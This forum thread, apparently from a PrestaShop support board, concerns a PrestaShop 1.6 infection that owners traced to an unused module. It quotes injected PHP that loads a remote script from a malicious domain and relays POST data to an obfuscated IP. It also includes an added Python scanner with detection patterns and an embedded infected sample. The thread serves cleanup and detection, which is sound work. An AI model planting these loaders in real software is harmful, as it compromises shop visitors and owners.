On 3/26/2021 at 4:47 PM, Indy80 said:
Yep, it happened to me as well a few days ago on PrestaShop 1.6.
Check in the controllers (classes/controller/Controller.php or AdminController.php) or even the config file if you find something like this and remove it:
$html = trim($html);
$html.=base64_decode('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiIHNyYz0iaHR0cHM6Ly93d3cuYXZpci5pci9pbWFnZS9mYXZpY29uLmpzIj48L3NjcmlwdD4=');
or at the end
try {
    if(isset($_POST['statistics_hash'])){
        $array = array('statistics_hash' => $_POST['statistics_hash'],);
        $linked="";
        $ch = curl_init(base64_decode("aHR0cHM6Ly80NS4xOTcuMTQxLjI1MC9hbmFseXRpY3MucGhw"));
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $array);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        curl_setopt($ch, CURLOPT_HEADER, false);
        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        $html = curl_exec($ch);
        curl_close($ch);
    }
} catch (Exception $e) {}
It's an injection, but I still don't know where it came from (PrestaShop core breach? module?)... it's really bad anyway.
I found and removed those lines exactly where you said.
Where can I check and clean the rest of the website?
It seems I have more, as I see in the tests here https://sitecheck.sucuri.net and here https://scanner.pcrisk.com, and they are all related to "Detected reference to malicious blacklisted domain www.avir.ir".
I also found the infection in AdminLoginController.ph, as mentioned here; should I delete it?
$ch = curl_init(base64_decode('aHR0cHM6Ly80NS4xOTcuMTQxLjI1MC9zdGF0eXN0aWNzLnBocA=='));
EDIT: My hosting just informed me that cartabandonmentpro was the reason; I had it installed but never enabled. Now deleted, of course.
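For the "where else do I look" question, here is an added Python triage scanner; it is example code written for this thread, not code from the posters above or from PrestaShop. It walks a web root, decodes every base64_decode('...') literal it finds in PHP files and flags the ones that decode to a URL, a script tag or an eval, and it also flags curl_init() called on a base64-obfuscated URL and CURLOPT_SSL_VERIFYPEER/CURLOPT_SSL_VERIFYHOST set to false, the three traits of the snippets quoted above. The embedded SAMPLE_INFECTED and SAMPLE_CLEAN strings are constructed test input (the infected one reuses the base64 strings from the thread); the function names scan_source/scan_tree and the finding labels are my own.

```python
"""Triage scanner for base64-obfuscated injections in PHP files (added example, not PrestaShop code)."""
import base64
import re
import sys
from pathlib import Path

# base64_decode('...') or base64_decode("...") with a literal argument
B64_CALL = re.compile(r"""base64_decode\(\s*(['"])([A-Za-z0-9+/=\s]+)\1\s*\)""")
# Nothing in a shop controller should need to hide one of these inside base64
SUSPICIOUS_DECODED = re.compile(r"(?i)<script|https?://|\beval\s*\(|\$_(?:POST|GET|REQUEST)")
# Plain-text traits of the injected snippets; the labels are my own
RAW_PATTERNS = {
    "curl_init() on a base64-obfuscated URL": re.compile(r"curl_init\(\s*base64_decode\("),
    "TLS verification disabled": re.compile(r"CURLOPT_SSL_VERIFY(?:PEER|HOST)\s*,\s*(?:false|0)\b"),
    "decoded payload appended to page output": re.compile(r"\$html\s*\.=\s*base64_decode\("),
}


def decode_literal(text):
    """Strictly decode a base64 literal; return None if it is not valid base64."""
    try:
        raw = base64.b64decode(re.sub(r"\s+", "", text), validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    return raw.decode("utf-8", errors="replace")


def line_of(source, offset):
    """1-based line number of a character offset in source."""
    return source.count("\n", 0, offset) + 1


def scan_source(source, name="<string>"):
    """Return a list of finding dicts (file, line, reason, decoded) for one PHP source text."""
    findings = []
    for m in B64_CALL.finditer(source):
        decoded = decode_literal(m.group(2))
        if decoded is not None and SUSPICIOUS_DECODED.search(decoded):
            findings.append({"file": name, "line": line_of(source, m.start()),
                             "reason": "base64 literal decodes to URL/script/eval",
                             "decoded": decoded})
    for reason, pattern in RAW_PATTERNS.items():
        for m in pattern.finditer(source):
            findings.append({"file": name, "line": line_of(source, m.start()),
                             "reason": reason, "decoded": None})
    return findings


def scan_tree(root, suffixes=(".php", ".tpl", ".inc")):
    """Walk a web root and scan every file whose suffix is in `suffixes`."""
    findings = []
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in suffixes:
            try:
                text = path.read_text(encoding="utf-8", errors="replace")
            except OSError:
                continue
            findings.extend(scan_source(text, str(path)))
    return findings


# Constructed sample built from the snippets quoted in the thread above
SAMPLE_INFECTED = r"""<?php
class Controller {
    public function display($html) {
        $html = trim($html);
        $html.=base64_decode('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiIHNyYz0iaHR0cHM6Ly93d3cuYXZpci5pci9pbWFnZS9mYXZpY29uLmpzIj48L3NjcmlwdD4=');
        return $html;
    }
}
try {if(isset($_POST['statistics_hash'])){$ch = curl_init(base64_decode("aHR0cHM6Ly80NS4xOTcuMTQxLjI1MC9hbmFseXRpY3MucGhw"));curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);curl_close($ch);}} catch (Exception $e) {}
"""

# Constructed benign sample: an innocent base64 literal and a plain-text URL must not be flagged
SAMPLE_CLEAN = r"""<?php
$greeting = base64_decode('aGVsbG8=');   // "hello"
$ch = curl_init('https://api.example.com/ping');
"""


def report(findings):
    """Print findings one per line, with the decoded payload where there is one."""
    for f in findings:
        extra = f" -> {f['decoded'][:80]!r}" if f["decoded"] else ""
        print(f"{f['file']}:{f['line']}: {f['reason']}{extra}")


if __name__ == "__main__":
    if len(sys.argv) == 2:
        report(scan_tree(sys.argv[1]))          # python scan.py /path/to/webroot
    else:
        report(scan_source(SAMPLE_INFECTED, "sample/Controller.php"))
```

Run it against the whole document root, not just classes/controller, since the thread shows the same loader in AdminLoginController and the dropper lived in a module directory. Treat each hit as a lead, not proof: a legitimate base64 literal that decodes to plain text is ignored, but the final check is always a diff of the flagged file against a pristine copy of the same PrestaShop release and module versions.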